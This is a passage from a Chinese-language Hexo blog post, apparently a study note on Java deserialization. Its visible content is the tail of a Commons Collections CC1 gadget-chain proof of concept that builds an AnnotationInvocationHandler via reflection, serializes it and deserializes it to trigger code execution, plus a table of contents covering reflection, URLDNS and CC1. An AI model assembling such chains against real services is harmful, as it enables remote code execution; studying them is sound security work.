class="type">Constructor</span> <span class="variable">annotationInvocationHandlerConstructor</span> <span class="operator">=</span> c.getDeclaredConstructor(Class.class, Map.class);</span><br><span class="line">        <span class="comment">// 确保可访问</span></span><br><span class="line">        annotationInvocationHandlerConstructor.setAccessible(<span class="literal">true</span>);</span><br><span class="line">        <span class="comment">// 为了走进readObject的第一个if判断：必须将注解调用控制器构造器的构造方法参数设置为含有成员变量的类</span></span><br><span class="line">        <span class="type">Object</span> <span class="variable">o</span> <span class="operator">=</span> annotationInvocationHandlerConstructor.newInstance(Target.class, transformedMap);</span><br><span class="line">        Serialization.serialize(o);</span><br><span class="line">        Unserialization.unserialize(<span class="string">&quot;ser.bin&quot;</span>);</span><br><span class="line"></span><br><span class="line">    &#125;</span><br></pre></td></tr></table></figure>
<p>实现效果<br><img src="https://cdn.nlark.com/yuque/0/2022/png/22346635/1649540651102-cd2912f4-decf-40f6-a0b2-c09dfa2b62e5.png" alt="image.png"></p>

    </div>

    
    
    

      <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/%E5%AD%A6%E4%B9%A0/" rel="tag"># 学习</a>
          </div>

        


        
    <div class="post-nav">
      <div class="post-nav-item"></div>
      <div class="post-nav-item">
    <a href="/2022/08/06/220806-%E6%97%A5%E8%AE%B0/" rel="next" title="220806-日记">
      220806-日记 <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          
    <div class="comments" id="valine-comments"></div>

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          Table of Contents
        </li>
        <li class="sidebar-nav-overview">
          Overview
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%89%8D%E8%A8%80"><span class="nav-number">1.</span> <span class="nav-text">前言</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%89%8D%E7%BD%AE%E7%9F%A5%E8%AF%86"><span class="nav-number">2.</span> <span class="nav-text">前置知识</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C"><span class="nav-number">2.1.</span> <span class="nav-text">命令执行</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#java%E5%8F%8D%E5%B0%84"><span class="nav-number">2.2.</span> <span class="nav-text">java反射</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#%E4%BB%80%E4%B9%88%E6%98%AF%E5%8F%8D%E5%B0%84"><span class="nav-number">2.2.1.</span> <span class="nav-text">什么是反射</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E4%B8%BA%E4%BB%80%E4%B9%88%E8%A6%81%E5%8F%8D%E5%B0%84"><span class="nav-number">2.2.2.</span> <span class="nav-text">为什么要反射</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E9%80%9A%E8%BF%87%E5%8F%8D%E5%B0%84%E8%8E%B7%E5%8F%96%E7%B1%BB%E5%AF%B9%E8%B1%A1"><span class="nav-number">2.2.3.</span> <span class="nav-text">通过反射获取类对象</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E9%80%9A%E8%BF%87%E5%8F%8D%E5%B0%84%E5%88%9B%E5%BB%BA%E7%B1%BB%E5%AF%B9%E8%B1%A1"><span class="nav-number">2.2.4.</span> <span class="nav-text">通过反射创建类对象</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E8%8E%B7%E5%8F%96%E7%B1%BB%E5%B1%9E%E6%80%A7"><span class="nav-number">2.2.5.</span> <span class="nav-text">获取类属性</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E8%8E%B7%E5%8F%96%E5%AF%B9%E8%B1%A1%E6%96%B9%E6%B3%95"><span class="nav-number">2.2.6.</span> <span class="nav-text">获取对象方法</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E5%8A%A8%E6%80%81%E4%BB%A3%E7%90%86"><span class="nav-number">2.2.7.</span> <span class="nav-text">动态代理</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#java%E5%BA%8F%E5%88%97%E5%8C%96%E5%92%8C%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96"><span class="nav-number">2.3.</span> <span class="nav-text">java序列化和反序列化</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E7%9A%84%E6%93%8D%E4%BD%9C%E5%87%BD%E6%95%B0"><span class="nav-number">2.3.1.</span> <span class="nav-text">反序列化的操作函数</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E%E6%88%90%E5%9B%A0"><span class="nav-number">2.3.2.</span> <span class="nav-text">反序列化漏洞成因</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E6%80%8E%E4%B9%88%E6%89%BE%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E5%88%A9%E7%94%A8%E9%93%BE"><span class="nav-number">2.3.3.</span> <span class="nav-text">怎么找反序列化利用链</span></a></li></ol></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#java%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96-URLDNS%E9%93%BE"><span class="nav-number">3.</span> <span class="nav-text">java反序列化-URLDNS链</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%80%8E%E4%B9%88%E5%8F%91%E7%8E%B0%E7%9A%84"><span class="nav-number">3.1.</span> <span class="nav-text">怎么发现的</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%88%A9%E7%94%A8%E9%93%BE-gt-%E5%85%A5%E5%8F%A3%E7%B1%BB"><span class="nav-number">3.2.</span> <span class="nav-text">利用链-&gt;入口类</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%80%BB%E7%BB%93"><span class="nav-number">3.3.</span> <span class="nav-text">总结</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#CC1"><span class="nav-number">4.</span> <span class="nav-text">CC1</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E7%9B%AE%E6%A0%87-sink"><span class="nav-number">4.1.</span> <span class="nav-text">目标-sink</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%88%A9%E7%94%A8%E9%93%BE-gadget"><span class="nav-number">4.2.</span> <span class="nav-text">利用链-gadget</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%85%A5%E5%8F%A3%E7%B1%BBsource"><span class="nav-number">4.3.</span> <span class="nav-text">入口类source</span></a></li></ol></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="ap"
      src="/Avatar/ava.jpg">
  <p class="site-author-name" itemprop="name">ap</p>
  <div class="site-description" itemprop="description">ap@2022</div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">3</span>
          <span class="site-state-item-name">posts</span>
        </a>
      </div>
      <div class="site-state-item site-state-tags">
        <span class="site-state-item-count">3</span>
        <span class="site-state-item-name">tags</span>
      </div>
  </nav>
</div>
  <div class="links-of-author motion-element">
      <span class="links-of-author-item">
        <a href="mailto:eehkcn@gmail.com" title="E-Mail → mailto:eehkcn@gmail.com" rel="noopener" target="_blank"><i class="fa fa-envelope fa-fw"></i>E-Mail</a>
      </span>
  </div>
  <div class="cc-license motion-element" itemprop="license">
    <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/" class="cc-opacity" rel="noopener" target="_blank"><img src="/images/cc-by-nc-sa.svg" alt="Creative Commons"></a>
  </div>


  <div class="links-of-blogroll motion-element">
    <div class="links-of-blogroll-title"><i class="fa fa-link fa-fw"></i>
      Links
    </div>
    <ul class="links-of-blogroll-list">
        <li class="links-of-blogroll-item">
          <a href="https://liriu.life/" title="https:&#x2F;&#x2F;liriu.life&#x2F;" rel="noopener" target="_blank">小草莓</a>
        </li>
    </ul>
  </div>

      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2022</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">ap</span>
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item-icon">
      <i class="fa fa-chart-area"></i>
    </span>
      <span class="post-meta-item-text">Symbols count total: </span>
    <span title="Symbols count total">16k</span>
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item-icon">
      <i class="fa fa-coffee"></i>
    </span>
      <span class="post-meta-item-text">Reading time total &asymp;</span>
    <span title="Reading time total">14 mins.</span>
</div>
  <div class="powered-by">Powered by <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://muse.theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Muse</a>
  </div>



        
<div class="busuanzi-count">
  <script async src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
    <span class="post-meta-item" id="busuanzi_container_site_uv" style="display: none;">
      <span class="post-meta-item-icon">
        <i class="fa fa-user"></i>
      </span>
      <span class="site-uv" title="Total Visitors">
        <span id="busuanzi_value_site_uv"></span>
      </span>
    </span>
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item" id="busuanzi_container_site_pv" style="display: none;">
      <span class="post-meta-item-icon">
        <i class="fa fa-eye"></i>
      </span>
      <span class="site-pv" title="Total Views">
        <span id="busuanzi_value_site_pv"></span>
      </span>
    </span>
</div>








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/muse.js"></script>


<script src="/js/next-boot.js"></script>




  




  
<script src="/js/local-search.js"></script>













  

  


<script>
NexT.utils.loadComments(document.querySelector('#valine-comments'), () => {
  NexT.utils.getScript('//unpkg.com/valine/dist/Valine.min.js', () => {
    var GUEST = ['nick', 'mail', 'link'];
    var guest = 'nick';
    guest = guest.split(',').filter(item => {
      return GUEST.includes(item);
    });
    new Valine({
      el         : '#valine-comments',
      verify     : true,
      notify     : true,
      appId      : 'AtM3SWdFSUAs46MzX9WsQGu7-gzGzoHsz',
      appKey     : 'zSQFBTLEmWT4A5ODtS4uDPz3',
      placeholder: "Just go go",
      avatar     : 'mm',
      meta       : guest,
      pageSize   : '10' || 10,
      visitor    : false,
      lang       : '' || 'zh-cn',
      path       : location.pathname,
      recordIP   : true,
      serverURLs : ''
    });
  }, window.Valine);
});
</script>

</body>
</html>
